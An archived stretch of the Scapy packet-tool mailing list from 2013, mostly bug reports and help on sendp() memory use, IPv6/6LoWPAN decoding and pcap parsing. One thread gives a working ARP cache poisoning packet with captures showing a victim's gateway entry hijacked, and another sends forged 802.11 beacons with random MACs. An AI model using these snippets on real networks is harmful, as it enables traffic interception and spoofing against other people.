gmane.comp.security.scapy.general

[Scapy][bug]Memory leak in sendp() function

Stepan B. — 2013-05-20T20:43:42

Hi!

Great thx from happy Scapy user! :)

I experience a problem with memory leak(s) in sendp() function (I 
suppose): sending more than 30 000 packets with sendp() cause FreeBSD to 
kill python's process due to his large size in memory (over 3 Gb!). 
Please, fix it! :(

I wrote short test with some debug information - he tries to send 
10000000 packets with sendp(). FreeBSD 8.2+ x86 (scapy 2.2.0, 2.1.1) 
fails approximately at 30 000'th packet. Here it is:
<test begin>
#! /usr/bin/env python
# -*- coding: utf-8 -*-

from scapy.all import *
from scapy.layers.inet import IP, TCP, UDP, ICMP
from scapy.layers.sctp import SCTP
from commands import *

import gc
import pdb

def printAllGcObjs():
   i = 0
   sum = 0
   for obj in gc.get_objects():
     i = i + 1
     curBytes = sys.getsizeof(obj)
     sum = sum + curBytes
     print('\n\nObject #' + str(i) + ' (' + str(curBytes) + ' bytes, all 
elements by now are at ' + str(sum) + ' bytes):')
     #print obj # Informative, but unsafe: scapy may brake this by 
throwing "*** Type error bla-bla-bla...".
   print i

port = 1024
counter = 0
counter_to_print = 1
while port < 10000000:
print('\n\n\n\n                                            Packet #' + 
str(counter_to_print) + '\n\n\n')
   counter_to_print = counter_to_print + 1
   if port == 65534:
     port = 1024
   pkt_A_TCP_start1 = Ether(src="00:0c:29:1e:b4:15", 
dst="00:0c:29:1e:b4:10") / IP(version=4L, id=1000, src="10.0.0.1", 
dst="10.0.0.2") / TCP(sport=1027, dport=port, seq=0x0)
   sendp(pkt_A_TCP_start1, iface='em0', verbose=0)
   del(pkt_A_TCP_start1)
   port=port+1
   counter = counter + 1
   if counter == 10000:
     text = getoutput('top -S')
     print text
     print gc.garbage
     gc.collect()
     print gc.garbage
     test = getoutput('top -S')
     print text
     #time.sleep(10)
     counter = 0
     printAllGcObjs()
     pdb.set_trace()
<test end>

I appreciate what you are doing and have a hope that you will pay 
attention to my request!


P.S. I can't neither login, nor register to trac.secdev.org/scapy - I'd 
rather post this bug as ticket there.

--
Best regards,
Stepan Bajburtyan

stepan.bajburtyan< at >gmail.com

---------------------------------------------------------------------
To unsubscribe, send a mail to scapy.ml-unsubscribe< at >secdev.org

Re: Re: Decoding IPv6/sixlowpan problem

Bruce Barnett — 2013-05-13T15:18:49


Thank you, Philippe! This works now!!

---------------------------------------------------------------------
To unsubscribe, send a mail to scapy.ml-unsubscribe< at >secdev.org

Re: Re: Decoding IPv6/sixlowpan problem

Philippe Biondi — 2013-05-11T22:44:55


If you do that in sample.mysmmary(), then self is sample,
self.underlayer is UDP and self.underlayer.underlayer is IPv6. Hence:

self.underlayer.underlayer.sprintf("UDP %IPv6.src%:%UDP.sport% ...)

---------------------------------------------------------------------
To unsubscribe, send a mail to scapy.ml-unsubscribe< at >secdev.org

Re: Decoding IPv6/sixlowpan problems exe

Carlos Perez — 2013-05-11T18:57:44

Fveverdedd

Sent from my iPhone

On May 11, 2013, at 2:30 PM, Bruce Barnett <grymoire< at >gmail.com> wrote:


---------------------------------------------------------------------
To unsubscribe, send a mail to scapy.ml-unsubscribe< at >secdev.org

Re: Re: Decoding IPv6/sixlowpan problem

Bruce Barnett — 2013-05-11T18:40:21

Yes, I understand.  As I said, I also tried to use the IP field names
to get the IP addresses, i.e

self.underlayer.sprintf("UDP %IP.src%:%UDP.sport% %IP.dst%:%UDP.dport% sample")
 I've also tried

self.underlayer.sprintf("UDP %IPv6.src%:%UDP.sport%
%IPv6.dst%:%UDP.dport% sample")

And that doesn't work either. I've tried to debug this, and find out
what I am doing wrong, but I'm not making much progress.

---------------------------------------------------------------------
To unsubscribe, send a mail to scapy.ml-unsubscribe< at >secdev.org

Re: Decoding IPv6/sixlowpan problem

Bruce Barnett — 2013-05-11T18:30:05

I did a tcpdump capture on a 802.15.4/6LoWPAN wireless network, on the
device with the radio that was sending/receiving the data.
The packet capture type was "Raw IP" - apparently the implementation
didn't capture any frame information, so it stored it without this
data.

But the IP version in the packet is  6, not 4, so the packet should be
decoded as IPv6.
Wireshark and tcpdump both decode the packet as IPv6. Scapy decodes it as IPv4.

---------------------------------------------------------------------
To unsubscribe, send a mail to scapy.ml-unsubscribe< at >secdev.org

Re: Re: Decoding IPv6/sixlowpan problem

Philippe Biondi — 2013-05-08T23:01:56


UDP does not have src or dst fields. They lie in the IPv6 layer. Note
that UDP's mysummary() method uses self.underlayer to access those
values.

---------------------------------------------------------------------
To unsubscribe, send a mail to scapy.ml-unsubscribe< at >secdev.org

Re: Decoding IPv6/sixlowpan problem

Philippe Biondi — 2013-05-08T22:58:04


[...]


Where does the packet come from ? A pcap ?
Did you have any warning saying that the linktype was unknown ?


---------------------------------------------------------------------
To unsubscribe, send a mail to scapy.ml-unsubscribe< at >secdev.org

RE: How to inject 802.11 frames on FreeBSD

Mark Moes — 2013-05-07T18:06:24

Hi all,


Could somebody be so kind to save this http://pastebin.com/rX5RGmvJ as fakeap.py and execute it using the command

# strace python fakeap.py |& tee strace.out

and share the output? You will probably have to replace the |& part on linux to make it redirect stderr to the file. It doesn't matter which OS, as long as you're confident that your wireless radio is injecting successfully.

Setting the interface is described here http://www.secdev.org/projects/scapy/doc/usage.html#wireless-frame-injection 


Thanks,

Mark

From: mark_moes< at >hotmail.com
To: scapy.ml< at >secdev.org
Date: Thu, 25 Apr 2013 13:42:00 +0200
Subject: [scapy.ml] How to inject 802.11 frames on FreeBSD




I already posted this same question on stackoverflow http://stackoverflow.com/questions/16212208/how-to-inject-802-11-frames-with-scapy-on-freebsd but I'll just copy the whole text.


On a FreeBSD 8.1 machine I am trying to inject 802.11 frames with Scapy 2.2.0 as described in the documentation's example: http://www.secdev.org/projects/scapy/doc/usage.html#wireless-frame-injection. I installed it from a precompiled FreeBSD package.

This is how I entered it in Scapy's console:

    def doit(intf):
        sendp(Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2=RandMAC(),addr3=RandMAC())/
          Dot11Beacon(cap="ESS")/
          Dot11Elt(ID="SSID",info='I should see this')/
          Dot11Elt(ID="Rates",info='\x82\x84\x0b\x16')/
          Dot11Elt(ID="DSset",info="\x03")/
          Dot11Elt(ID="TIM",info="\x00\x01\x00\x00"),iface=intf,loop=1)

I have created interfaces in the following ways (and started them by issueing `ifconfig wlanx up`):

    ifconfig wlan create wlandev ath0 wlanmode monitor
    wlan1
    ifconfig wlan create wlandev ath0 wlanmode hostapd
    wlan2

I checked on both my smartphone and laptop and no sign of a new SSID, even though it says that it sent a bunch of packets. Then again, I don't even need to start the interfaces, it will still tell me that it sent the packets.


According to source the sendp() function does the following:

    # scapy/sendrecv.py:259
    __gen_send(conf.L2socket(iface=iface, *args, **kargs), x, inter=inter, loop=loop, count=count, verbose=verbose, realtime=realtime)

    # scapy/arch/linux.py:401
    class L2Socket(SuperSocket):
        desc = "read/write packets at layer 2 using Linux PF_PACKET sockets"
        def __init__(self, iface = None, type = ETH_P_ALL, filter=None, nofilter=0):
            if iface is None:
                iface = conf.iface
            self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))

I'm thinking that FreeBSD sockets do not support the AF_PACKET parameter (see http://www.freebsd.org/cgi/man.cgi?query=socket&apropos=0&sektion=0&manpath=FreeBSD%208.1-RELEASE&arch=default&format=html), but that's just a wild guess.

Documentation error in build_dissect.rst

Bruce Barnett — 2013-05-02T17:22:50

In the file  scapy-com/scapy/doc/build_dissect.rst is the code:


        def m2i(self, pkt, x):
            if s is None:
                return None, 0
            return str2vlenq(x)[1]

"s" is undefined.

---------------------------------------------------------------------
To unsubscribe, send a mail to scapy.ml-unsubscribe< at >secdev.org

Bug: Scapy-com does not properly decode IPv6 packets when the IP version == 6

Bruce Barnett — 2013-05-02T15:03:50

When given an IPv6 packet trace, and the following code
    a=rdpcap("ipv6.pcap")
    print hexdump(a[1])
    print a[1].show()

scapy decodes it as IPv4:

0000   60 00 00 00 00 40 3A FF  FE 80 00 00 00 00 00 00   `....< at >:.........
0010   00 00 00 00 00 00 00 00  FF 02 00 00 00 00 00 00   ................
0020   00 00 00 00 00 00 00 01  86 00 8D 1D 40 00 00 00   ............< at >...
0030   00 00 00 00 00 00 00 00  01 01 00 00 00 00 00 00   ................
0040   05 01 00 00 00 00 05 DC  03 04 40 E0 00 00 03 20   ..........< at >....
0050   00 00 01 90 00 00 00 00  20 01 04 70 1F 15 16 EA   ........ ..p....
0060   00 00 00 00 00 00 00 00                            ........
None
###[ IP ]###
  version   = 6
  ihl       = 0
  tos       = 0x00
  len       = 0
  id        = 64
  flags     = MF
  frag      = 6911
  ttl       = 254
  proto     = 128
  chksum    = 0x00
  src       = 0.0.0.0
  dst       = 0.0.0.0
  \options   \
###[ Padding ]###
     load      =
'\x00\x00\x00\x00\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x86\x00\x8d\x1d< at >\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x05\x01\x00\x00\x00\x00\x05\xdc\x03\x04< at >\xe0\x00\x00\x03
\x00\x00\x01\x90\x00\x00\x00\x00
\x01\x04p\x1f\x15\x16\xea\x00\x00\x00\x00\x00\x00\x00\x00'
None

Clearly the version of the packet is IPv6. TCPdumnp and wireshark
decode it properly.


Workaround:
     conf.l2types.register(101, IPv6)

and the .show now prints
###[ IPv6 ]###
  version   = 6
  tc        = 0
  fl        = 0
  plen      = 64
  nh        = ICMPv6
  hlim      = 255
  src       = fe80::
  dst       = ff02::1
###[ ICMPv6 Neighbor Discovery - Router Advertisement ]###
     type      = Router Advertisement
     code      = 0
     cksum     = 0x8d1d
     chlim     = 64
     M         = 0
     O         = 0
     H         = 0
     prf       = Medium (default)
     P         = 0
     res       = 0
     routerlifetime= 0
     reachabletime= 0
     retranstimer= 0
###[ ICMPv6 Neighbor Discovery Option - Source Link-Layer Address ]###
        type      = 1
        len       = 1
        lladdr    = 00:00:00:00:00:00
###[ ICMPv6 Neighbor Discovery Option - MTU ]###
           type      = 5
           len       = 1
           res       = 0x00
           mtu       = 1500
###[ ICMPv6 Neighbor Discovery Option - Prefix Information ]###
              type      = 3
              len       = 4
              prefixlen = 64
              L         = 1
              A         = 1
              R         = 1
              res1      = 0
              validlifetime= 0x0320
              preferredlifetime= 0x0190
              res2      = 0x00
              prefix    = 2001:470:1f15:16ea::
None

---------------------------------------------------------------------
To unsubscribe, send a mail to scapy.ml-unsubscribe< at >secdev.org

Re: Decoding IPv6/sixlowpan problem

Bruce Barnett — 2013-05-01T18:20:58


I'm not sure this was right. I've also used this:
conf.l2types.register(101, SixLoWPAN)

But now I have another problem. I'm creating a new layer on top of the
6LoWPAN layer. Here is the code, called sample.py
----------------------------------------
from scapy.all import *
import socket
import struct
from scapy.layers.inet import  *
from scapy.layers.inet6 import  *
from scapy.layers.sixlowpan import *
class sample(Packet):
    name = "sample"
    def mysummary(self):
        if isinstance(self.underlayer, UDP):
            return self.underlayer.sprintf("UDP %UDP.src%:%UDP.sport%
        else:
            return "sample"

bind_layers( UDP, sample, sport=5683 )
bind_layers( UDP, sample, dport=5683 )
--------------------------------------------------------
Now when I try to decode this packet, and print the UDP (or IPv6)
source and address, I get "??" instead of the real value:

SixLoWPAN / LoWPAN_IPHC / IPv6 / UDP / UDP ??:5683 > ??:61631 sample / Raw

but if I don't import my class, I get the default (correct) behavior:
SixLoWPAN / LoWPAN_IPHC / IPv6 / UDP 2001:470:1f15:16ea::acdc:5683 >
2001:470:1f15:16ea:202:304:506:709:61631 / Raw

Any suggestions?

---------------------------------------------------------------------
To unsubscribe, send a mail to scapy.ml-unsubscribe< at >secdev.org

Re: byte array from raw packet data

Kevin Ross — 2013-04-30T05:05:49

Thanks. Let me see if I understand--in packet[0] I have the first packet,
still in pcap form. Then chexdump converts to a string and then converts
characters to bytes:

def chexdump(x):
    x=str(x)
    print ", ".join(map(lambda x: "%#04x"%ord(x), x))


I don't need to print them, just set them up in an array for later
processing, but I suppose I could use something like this to assign the
byte values to an array and then process through the rest of the pcap file.
Does this seem like a reasonable approach?

Thanks,

Kevin




On Fri, Apr 26, 2013 at 7:13 AM, Bruce Barnett <grymoire< at >gmail.com> wrote:

Re: Using fragment6 with layer2 commands

Nathan Michaels — 2013-04-29T21:33:34

Yes, I've sent fragmented IPv6 packets using sendp.


On Mon, Apr 29, 2013 at 5:15 PM, Antonios Atlasis <
antonios.atlasis< at >gmail.com> wrote:

Using fragment6 with layer2 commands

Antonios Atlasis — 2013-04-29T21:15:49

Hi,

I know that in order to fragment IPv6 packets, you can use fragment6.
However, all the examples that I have found are used with the send (layer
3) command.

Is this possible to use fragment6 with a layer 2 command, as for example
sendp or srp? Is for example to use sthg like
sendp(Ether()/frasgment6(...),iface)?

Thanks in advance

Antonios

Re: byte array from raw packet data

Bruce Barnett — 2013-04-26T14:13:32



Try the scapy/utils.py hexdump function, or perhaps chexdump(), i.e.

packets=rdpcap("file.pcap")

print chexdump(packets[0])

---------------------------------------------------------------------
To unsubscribe, send a mail to scapy.ml-unsubscribe< at >secdev.org

Re: Decoding IPv6/sixlowpan problem

Bruce Barnett — 2013-04-26T14:05:18

I found a work-around.
Here's one way to "fix" the issue - force the linktype to be IPv6:

conf.l2types.register(101, IPv6)

---------------------------------------------------------------------
To unsubscribe, send a mail to scapy.ml-unsubscribe< at >secdev.org

byte array from raw packet data

Kevin Ross — 2013-04-26T04:30:39

Hello all,

I'm new to Scapy and I'm having trouble understanding how to do something
that is probably pretty simple. I want to process a pcap file and get the
raw packet data into an array of bytes. This is in order to do statistical
processing of the bytes to try to look for attacks in a manner similar to a
network-based IDS. If anyone has a suggestion I would appreciate it.

Thanks,

Kevin

Re: ARP Cache Poisong

Otavio Augusto — 2013-04-26T00:58:36

I edited the source to send and made a mistake =] ...
src=getmacbyip(me) is actually src=getmacbyip(me1) , where me1 is my IP.
Using src=get_if_hwaddr(iface) is more elegant I know



2013/4/25 Otavio Augusto <otavioarj< at >gmail.com>

Fwd: ARP Cache Poisong

Otavio Augusto — 2013-04-26T00:46:42

Hi,

May I missing something about arp cache poison? I had test the buildin
function arpcachepoison and it appears to be sending only an ARP Ping.

When I run that function, that is catch by tcpdump:
21:18:28.435348 ARP, Request who-has 192.168.1.1 tell 192.168.1.4, length 28
    0x0000:  0001 0800 0604 0001 0800 2721 75ed c0a8
    0x0010:  0104 0000 0000 0000 c0a8 0101
21:18:28.435692 ARP, Reply 192.168.1.1 is-at c4:3d:c7:4b:53:ac (oui
Unknown), length 46
    0x0000:  0001 0800 0604 0002 c43d c74b 53ac c0a8
    0x0010:  0101 0800 2721 75ed c0a8 0104 0000 0000
    0x0020:  0000 0000 0000 0000 0000 8c81 70b8

So it's just forging a request from 192.168.1.4 asking who is the the
router. When checking 192.168.1.4 arp cache, that is there:

Interface: 192.168.1.4 --- 0xd
  Internet Address      Physical Address      Type
  192.168.1.1           c4-3d-c7-4b-53-ac     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff                static

Actually the gateway MAC. So.. ? Maybe I didn't understand the prototype of
that function, a missing parameter? =]

After using that:
poison=
Ether(dst=getmacbyip(target),src=getmacbyip(me))/ARP(op="is-at",psrc=me,
pdst=target)
sendp(poison)


tcpdump catch that:
21:28:34.023229 ARP, Reply 192.168.1.1 is-at 00:1e:68:92:ad:68 (oui
Unknown), length 28
    0x0000:  0001 0800 0604 0002 001e 6892 ad68 c0a8
    0x0010:  0101 0000 0000 0000 c0a8 0104


And arp cache on 192.168.1.4 is:

Interface: 192.168.1.4 --- 0xd
  Internet Address      Physical Address      Type
  192.168.1.1           00-1e-68-92-ad-68     dynamic
  192.168.1.3           00-1e-68-92-ad-68     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff                static

Where the gateway have my MAC now, so a successful ARP Poisong attack. For
some reason there is tons of codes on internet reproducing that "who-has"
behavior, so maybe I'm missing something... is I?

Best

RE: scapy SNMP decode doesn't recognize GAUGE32 ?

Reynolds, Samuel — 2013-04-25T18:20:19

Looks like this has already been fixed.
I was using v2.0. Upgrading to v2.2 took care of it.

Thanks for creating scapy. It's much more straightforward to use than other packages I've worked with.



---------------------------------------------------------------------
To unsubscribe, send a mail to scapy.ml-unsubscribe< at >secdev.org